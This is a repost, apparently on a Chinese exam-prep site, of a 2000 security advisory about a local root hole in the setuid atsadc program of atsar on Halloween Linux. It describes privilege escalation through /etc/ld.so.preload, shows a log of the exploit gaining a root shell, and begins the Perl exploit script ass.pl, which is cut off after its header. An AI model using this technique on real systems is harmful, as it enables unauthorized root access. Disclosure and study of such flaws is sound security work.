设为首页    加入收藏
学历| 高考 中考 考研 自考 成考  外语| CET6 职称英语 商务英语 公共英语  资格| 公务员 报关员 银行 证券 司法 导游 教师  计算机| 等考 软考
工程| 一建 二建 造价师 监理师 咨询师 安全师 结构师 估价师 造价员  会计| 会计证 中级会计 注会 经济师 税务师  医学| 卫生资格 医师 药师 [更多]
搜索一下 
站内搜索:
 
热门关键字:考试动态 | 报考指南 | 考试试题 | 辅导课程 | 复习辅导 |
您当前的位置: 首页 > Linux认证考试 > 综合辅导

Linuxatsadc输入文件检查漏洞

来源:Linux认证    发布时间:2012-11-10    Linux认证视频    评论

  受影响系统:

  AT Computing atsar 1.4-linux

  + Halloween Linux 4.0

  描述:

  atsar是一个Linux下的负载监视软件包,由AT Computing出品。这个软件包中有个程序atsadc

  被设置了setuid root位。atsadc会接受一个参数作为输入文件名,并将打开这个文件,但是

  它没有检查是否该用户有权限读写这个文件。当它以root身份打开或者创建目标文件后,攻击

  在者可能写入任意内容到这个文件中。通过创建恶意的系统文件,攻击者可能本地获得root权

  限。比如创建一个恶意的共享库,然后在/etc/ld.so.preload中增加这个库的路径,然后执行

  一个设置了setuid root的程序(比如/usr/bin/passwd),然后恶意共享库就将被预装载并执行。

  <* 来源: krahmer

  TESO advisory -- atsadc (http://teso.scene.at)

  *>

  测试方法:

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  liane:[bletchley]> id -a

  uid=501(bletchley) gid=501(bletchley) groups=501(bletchley)

  liane:[bletchley]> uname -a

  Linux liane.c-skills.de 2.2.13-13 #21 Thu Mar 2 10:36:13 WET 2000 i686 unknown

  liane:[bletchley]> stat `which atsadc`

  File: "/usr/sbin/atsadc"

  Size: 16000 Filetype: Regular File

  Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)

  Device: 3,1 Inode: 117038 Links: 1

  Access: Thu Mar 9 10:09:37 2000(00000.01:02:49)

  Modify: Tue Nov 9 23:57:50 1999(00120.11:14:36)

  Change: Tue Mar 7 14:55:23 2000(00001.20:17:03)[Page

  liane:[bletchley]> cd atsar-hack/

  liane:[atsar-hack]> ./ass.pl

  Creating hijack-lib ...

  Compiling hijack-lib ...

  Compile shell ...

  Invoking vulnerable program (atsadc)...

  sh: error in loading shared libraries:

  sh: error in loading shared libraries:

  Welcome. But as always: BEHAVE!

  sh-2.03# id -a

  uid=0(root) gid=0(root) groups=501(bletchley)

  sh-2.03#

  ---------------------------- ass.pl ------------------------------------------

  #!/usr/bin/perl

  # Halloween 4 local root-exploit, other distros are maybe

  # affected as well. (atsadc program)

  # (C) 2000 C-skills development, S. Krahmer under the GPL

  # linuxer">http://www.cs.uni-potsdam.de/homepages/students/linuxer

  # Exploit will create /etc/ld.so.preload, so it should NOT exist

  # already. THIS FILE WILL BE LOST!

  # ! USE IT AT YOUR OWN RISK !

  # For educational purposes only.

  print "Creating hijack-lib .../n";

上一页123下一页

视频学习

我考网版权与免责声明

① 凡本网注明稿件来源为"原创"的所有文字、图片和音视频稿件,版权均属本网所有。任何媒体、网站或个人转载、链接转贴或以其他方式复制发表时必须注明"稿件来源:我考网",违者本网将依法追究责任;

② 本网部分稿件来源于网络,任何单位或个人认为我考网发布的内容可能涉嫌侵犯其合法权益,应该及时向我考网书面反馈,并提供身份证明、权属证明及详细侵权情况证明,我考网在收到上述法律文件后,将会尽快移除被控侵权内容。

最近更新

社区交流

考试问答